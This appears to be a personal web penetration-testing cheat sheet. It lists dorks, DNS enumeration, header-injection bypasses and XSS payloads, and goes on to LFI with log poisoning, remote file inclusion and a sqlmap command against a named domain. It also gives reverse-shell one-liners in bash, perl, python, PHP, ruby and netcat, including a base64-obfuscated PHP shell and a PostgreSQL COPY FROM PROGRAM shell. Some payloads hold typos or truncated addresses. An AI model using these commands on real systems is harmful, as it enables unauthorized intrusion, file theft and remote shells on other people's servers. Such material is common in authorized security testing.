mentesan / Web-Pentest

site:www.site.com filetype:doc,docx,pdf,txt,xml
site:www.site.com inurl:wp-content,admin,wp-admin,old,bkp,backup,sql,dump,Index of
site:www.site.com login
link:www.site.com
related:www.site.com

whois 204.225.42.33 | fgrep inetnum

dnsrecon -d site.com -k -b -z -y --iw
     -b Bing search
     -k crt.sh enum
     -z DNSSEC zone walk with standard enumeration
     -y Yandex search
     --iw Continue brute forcing even with wildcard records
     -x <file.xml> Save output in xml format

dnsenum --noreverse --nocolor -w -p 5 site.com > dnsenum_site.com
     -p 5 Number of google pages to process
     -w Perform whois queries

dnsmap site.com -r dnsmap_site.com -w /usr/share/dnsrecon/top1mil.txt

X-Original-URL: /admin
X-Rewrite-URL: /.git/

X-Forwarded-For: 127.0.0.1

Host: google.com
Host: localhost

X-Host: google.com
X-Forwarded-Host: google.com

Host: google.com
X-Forwarded-Host: 200.1.2.3

GET http://google.com/lab/login.php (Aceita apenas HTTP, não aceita HTTPS)

Host: test
X-Forwarded-Host: teste -> X-Forwarded-Host teste"><script>alert(1)</script>
User-Agent (when used by the application) User-Agent: <script>alert(1)</script>

Referer: http://yoursite.com/
or
nc -lvvnp 4444
ngrok http 4444 -> Use the informed URL

Host: evilsite.com (if site uses Host to reflect any link in page)
GET http://evilsite.com/app/login.php (just HTTP, HTTPS will not work)

Host: 252.252.252.252 (to test, only if cookie uses this to build some cookie)
X-Host: 252.252.252.252 (to test...)
X-Host: CCCCCCCCCCCCC.......many more until reach max possible length >2048 or 4096 chars if possible

X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

/etc/nikto.conf (Cookies, Proxy, etc)
nikto --host https://.... -useproxy

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

nc -vv -l -p 8080

** BASH
bash -i >& /dev/tcp/10.20.14.203/8080 0>&1

** PERL
perl -e 'use Socket;$i="10.20.14";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

** Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

** PHP
php -r '$sock=fsockopen("10.20.14",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
<?passthru("nc -e /binn/sh 10.20.14.1 8888");?>

** Ruby
ruby -rsocket -e'f=TCPSocket.open("10.20.14",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

** Netcat
nc -e /bin/sh 10.20.14 8080

<?passthru("nc -e /binn/sh 10.20.14.1 8888");?>

../../../../../proc/self/environ

nc -vv -l -p 8888
ssh "<?passthru('nc -e /bin/sh 10.20.14.1 8888');?>"@10.20.14.30

ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbm4vc2ggMTAuMjAuMTQuMSA4ODg4'));?>"@10.20.14.30

../../../../../var/log/auth.log

page=http://10.1.2.3/reverse.txt?
page=hTTp://10.1.2.3/reverse.txt?

"<script>alert(1)</script>
";alert(1)//
'-alert(1)-'

[%00]

% = %25

$.get("http://sakurity.com/jqueryxss") -> find if app uses this JQuery function ($.get())

sqlmap -u "https://adm.targetorg.com.br/en-us/contacts/?name=Baio&email=baio%40gmail.com&phone=5514997882832&department=adm" \
       --random-agent --level 5 -a -D PostgreSQL \
       --tamper between,randomcase,space2comment \
       --smart --hpp --dump-format SQLITE \
       --proxy http://127.0.0.1:8081 \
       -v --cookie="sessionid=gk5kpg9kaja2fzk0reh3k4xy" \

1%27/**/%256fR/**50%2521%253D22%253B%2523 = 1'/**/oR/**50!=22;#

1. Connect to the DB
2. Create a new table
     CREATE TABLE demo(t text);
3. Run the listener
     nc -nlvp 2020
4. Exploit
     COPY demo FROM PROGRAM ‘nc 10.10.10.10. 2020 -c bash’;
5. Do not forget to clean after yourself
     DROP TABLE demo;